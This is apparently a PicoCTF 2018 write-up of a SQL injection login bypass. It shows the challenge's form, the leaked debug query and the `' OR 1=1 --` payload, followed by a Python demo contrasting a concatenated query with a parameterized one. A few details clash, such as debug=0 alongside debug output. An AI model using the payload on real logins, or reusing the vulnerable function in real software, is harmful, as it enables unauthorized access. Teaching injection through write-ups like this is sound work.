This is one of my writeups for PicoCTF 2018
There is a website running at http://2018shell3.picoctf.com:11899. Do you think you can log us in? Try to see if you can login!
- There doesn't seem to be many ways to interact with this, I wonder if the users are kept in a database?
The hint here seems to point at an SQL injection, but let's browse around the app first. We have access to three views:
- The index, that has nothing interesting
- A "support" page
- An "admin login page"
The support page contains another clue pointing at an SQL injection:
Hi. I tried adding my favorite Irish person, Conan O'Brien. But I keep getting something called a SQL Error
With that in mind, we can look at the login page. Inspecting the source, we see there's a hidden debug field:

```html
<form action="login.php" method="POST">
  <fieldset>
    <div class="form-group">
      <label for="username">Username:</label>
      <input type="text" id="username" name="username" class="form-control">
    </div>
    <div class="form-group">
      <label for="password">Password:</label>
      <div class="controls">
        <input type="password" id="password" name="password" class="form-control">
      </div>
    </div>
    <input type="hidden" name="debug" value="0">
    <div class="form-actions">
      <input type="submit" value="Login" class="btn btn-primary">
    </div>
  </fieldset>
</form>
```
To confirm that, I sent a request with a random username and no password (Note: I used Burp Suite's proxy and repeater to manipulate the requests). With debug=0, we get:

```
username: iodbh
password:
SQL query: SELECT * FROM users WHERE name='aaa' AND password=''
```

Login failed.
Great, now we know how the SQL query is constructed. We can try to return all rows with a username of `' OR 1=1 --` and an empty password, which will end up building the following query:

```sql
SELECT * FROM users WHERE name='' OR 1=1 --' AND password=''
```

Since anything after `--` is ignored, the effective query is:

```sql
SELECT * FROM users WHERE name='' OR 1=1
```

If we try this payload, we get the flag in the response:
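To show why the debug query above is exploitable and what the fix looks like, here is an added example (my own code, not part of the challenge) that rebuilds the same `SELECT ... WHERE name='...' AND password='...'` shape against a constructed in-memory SQLite table, once with string concatenation and once with bound parameters. The table contents and the password values are invented sample data.

```python
import sqlite3

# Constructed sample rows, not the challenge's real database.
USERS = [("admin", "placeholder-admin-pw"), ("alice", "hunter2")]

# The username the writeup sends; the password is left empty.
PAYLOAD = "' OR 1=1 --"


def make_db():
    """Build a throwaway in-memory users table matching the debug output."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    return conn


def login_vulnerable(conn, username, password):
    """Mirror the challenge: user input is pasted straight into the SQL text.

    Quotes and the -- comment marker in the input become SQL syntax, so the
    password clause is commented out and every row matches.
    """
    query = (f"SELECT * FROM users WHERE name='{username}' "
             f"AND password='{password}'")
    return conn.execute(query).fetchall()


def login_parameterized(conn, username, password):
    """Same lookup with bound parameters.

    The values travel separately from the SQL text, so the payload is
    compared literally against the name column and matches nothing.
    """
    query = "SELECT * FROM users WHERE name=? AND password=?"
    return conn.execute(query, (username, password)).fetchall()


if __name__ == "__main__":
    conn = make_db()
    print(login_vulnerable(conn, PAYLOAD, ""))      # returns both rows
    print(login_parameterized(conn, PAYLOAD, ""))   # returns []
    print(login_parameterized(conn, "alice", "hunter2"))  # one real match
```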